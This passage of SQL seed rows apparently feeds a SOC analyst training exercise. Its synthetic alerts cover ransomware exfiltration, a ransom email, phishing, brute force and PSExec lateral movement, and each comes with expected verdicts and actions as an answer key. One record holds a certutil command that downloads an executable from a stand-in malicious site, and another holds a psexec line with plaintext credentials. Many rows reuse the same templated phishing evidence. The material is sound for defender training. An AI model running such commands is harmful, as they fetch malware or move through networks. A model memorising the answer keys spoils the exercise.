used to execute ransomware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(930, 'Exfiltration: Data Harvesting', 'critical', 'Data loss prevention (DLP) systems', 'In a bid to strengthen their negotiating position, SamSam exfiltrated data, adding a layer of data breach to the incident. Sensitive files were transferred from the internal network to an external IP address associated with known malicious activity.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"action\":\"exfiltration\",\"status\":\"success\"}', '2026-01-15 01:04:52', '2026-02-16 17:54:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documents\",\"verdict\":\"sensitive\",\"details\":\"Contains sensitive financial data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Username of compromised 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(931, 'Ransom Demand: Communication Interception', 'critical', 'Email server logs', 'In the final phase of the attack, the threat actors delivered a ransom note to the victim\'s email, demanding $51,000 in Bitcoin. The attackers used compromised email accounts to send the note and negotiate payment terms, while the actual recovery costs spiraled beyond the ransom demand.', 'Command and Control', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:52:36Z\",\"source_ip\":\"203.0.113.54\",\"destination_ip\":\"10.0.0.5\",\"source_email\":\"compromised@victimdomain.com\",\"destination_email\":\"finance@victimdomain.com\",\"email_subject\":\"Urgent: Payment Required\",\"email_body\":\"Your systems have been encrypted. Send $51,000 in Bitcoin to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa. Failure to comply will result in data loss.\",\"attachment_name\":\"Ransom_Note.txt\",\"attachment_hash\":\"eb5e0e0c2e9c2f7b410f51f4b8c8f5e1\",\"compromised_user\":\"j.doe@victimdomain.com\"}', '2026-01-15 01:04:52', '2026-02-16 17:54:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP where the ransom note was delivered.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"compromised@victimdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Investigation\",\"verdict\":\"malicious\",\"details\":\"Employee email account used by attackers to send ransom 
note.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"eb5e0e0c2e9c2f7b410f51f4b8c8f5e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware note attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Ransom Demand: Communication Interception\",\"date\":\"2026-02-01T20:32:22.618Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(932, 'Phishing Attempt Detected from Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was received from a spoofed domain with a malicious link embedded. The email purports to be from a trusted source, tricking users into clicking the link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-16T08:23:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"jdoe-laptop\",\"email_sender\":\"no-reply@secure-update.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-16 13:02:59', '2026-03-11 03:14:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Phishing domain known for credential harvesting\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 50 times for phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are verified malicious through OSINT, confirming a phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected from Spoofed Domain\",\"date\":\"2026-02-01T20:32:22.618Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(933, 'Suspicious Command Line Execution Detected', 'medium', 'Proofpoint', 'A potentially malicious command was executed on a user\'s machine, indicating a possible attempt to gain persistence or execute further attacks.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-16T11:12:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.2.50\",\"username\":\"mjohnson\",\"hostname\":\"workstation-05\",\"command_line\":\"cmd.exe /c echo %TEMP% & certutil -urlcache -f http://suspicious-site.com/file.exe C:\\\\Users\\\\mjohnson\\\\file.exe\"}', '2026-01-16 13:02:59', '2026-03-11 03:06:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"cmd.exe /c echo %TEMP% & certutil -urlcache -f http://suspicious-site.com/file.exe C:\\\\Users\\\\mjohnson\\\\file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates possible malware download attempt\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://suspicious-site.com/file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command execution is part of a known malware pattern, downloading and executing malicious payloads.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Command Line Execution 
Detected\",\"date\":\"2026-02-01T20:32:22.619Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(934, 'Brute Force Login Attempts Detected', 'high', 'Proofpoint', 'Multiple failed login attempts detected against an internal server, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'Closed', 177, '{\"timestamp\":\"2026-01-16T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"192.168.10.10\",\"username\":\"administrator\",\"hostname\":\"server01\",\"failed_attempts\":25}', '2026-01-16 13:02:59', '2026-02-22 08:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 200 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP confirms a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Brute Force Login Attempts Detected\",\"date\":\"2026-02-01T20:32:22.620Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(935, 'Malware Download Attempt via Suspicious Domain', 'critical', 'Proofpoint', 'A file download from a known malicious domain was detected, indicating a high likelihood of malware infection.', 'Malware', 'T1129', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T07:30:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.50.3\",\"dst_ip\":\"185.199.108.153\",\"username\":\"kwhite\",\"hostname\":\"kwhite-pc\",\"url\":\"http://known-malicious.com/download.exe\",\"file_hash\":\"3d2e7f3b5b2e8c8e6c2f1a5d0e8c9b9a\"}', '2026-01-16 13:02:59', '2026-02-16 17:53:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://known-malicious.com/download.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"file_hash\",\"value\":\"3d2e7f3b5b2e8c8e6c2f1a5d0e8c9b9a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used for malware hosting\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.50.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal client machine\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and URL are confirmed malicious, indicating an active threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malware Download Attempt via Suspicious 
Domain\",\"date\":\"2026-02-01T20:32:22.621Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(936, 'Suspicious Network Connection Detected', 'medium', 'Proofpoint', 'An unusual network connection was established from an internal host to an external IP known for suspicious activity.', 'Data Exfiltration', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-16T14:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.30.10\",\"dst_ip\":\"45.67.89.101\",\"username\":\"hparker\",\"hostname\":\"hparker-device\",\"domain\":\"suspicious-domain.net\"}', '2026-01-16 13:02:59', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"suspicious-domain.net\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain flagged for potential data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.30.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP and domain are flagged as suspicious, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Network Connection Detected\",\"date\":\"2026-02-01T20:32:22.621Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(937, 'Unusual Login Failure from Known Safe IP', 'low', 'Proofpoint', 'A login failure was detected from an IP address previously verified as safe. No further suspicious activity noted.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-16T09:12:11Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"bsmith\",\"hostname\":\"office-01\",\"failed_attempts\":5}', '2026-01-16 13:02:59', '2026-02-26 21:49:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Known safe internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"bsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is a known safe internal address, indicating a benign activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Unusual Login Failure from Known Safe IP\",\"date\":\"2026-02-01T20:32:22.622Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(938, 'Failed Process Execution from Internal Script', 'low', 'Proofpoint', 'A process execution attempt failed due to incorrect scripting, originating from an internal automation script.', 'Malware', 'T1106', 0, 'Closed', 232, '{\"timestamp\":\"2026-01-16T13:55:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.15\",\"dst_ip\":\"192.168.5.20\",\"username\":\"automation\",\"hostname\":\"automation-server\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\"}', '2026-01-16 13:02:59', '2026-03-09 18:22:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Regular internal script with a known issue\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal automation server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of an internal script that failed due to a known error.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Failed Process Execution from Internal Script\",\"date\":\"2026-02-01T20:32:22.623Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(939, 'Lateral Movement Attempt via PSExec Detected', 'critical', 'Proofpoint', 'PSExec was used to attempt lateral movement within the network, indicating possible intrusion activity.', 'Lateral Movement', 'T1570', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T05:40:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.5\",\"dst_ip\":\"192.168.100.25\",\"username\":\"admin-temp\",\"hostname\":\"compromised-host\",\"command_line\":\"psexec \\\\\\\\192.168.100.25 -u admin -p password cmd.exe /c whoami\"}', '2026-01-16 13:02:59', '2026-02-16 17:53:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.100.25 -u admin -p password cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec use indicates lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal host\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec is a legitimate tool but commonly used for malicious lateral movement, confirming the attack.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Lateral Movement Attempt via PSExec Detected\",\"date\":\"2026-02-01T20:32:22.624Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(940, 'Spear Phishing Attempt with Lookalike Domain', 'high', 'Proofpoint', 'An email was received from a domain that closely resembles a trusted partner\'s domain. The email contained an urgent request to review a document linked in the email.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T08:23:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jdoe@victimcompany.com\",\"hostname\":\"user-laptop-01\",\"email_sender\":\"ceo@trustedpartnerr.com\",\"domain\":\"trustedpartnerr.com\",\"url\":\"http://malicious-link.com/document\"}', '2026-01-16 13:04:11', '2026-02-16 17:12:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@trustedpartnerr.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain and URL are known for phishing, indicating a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Lookalike Domain\",\"date\":\"2026-02-01T20:32:22.625Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
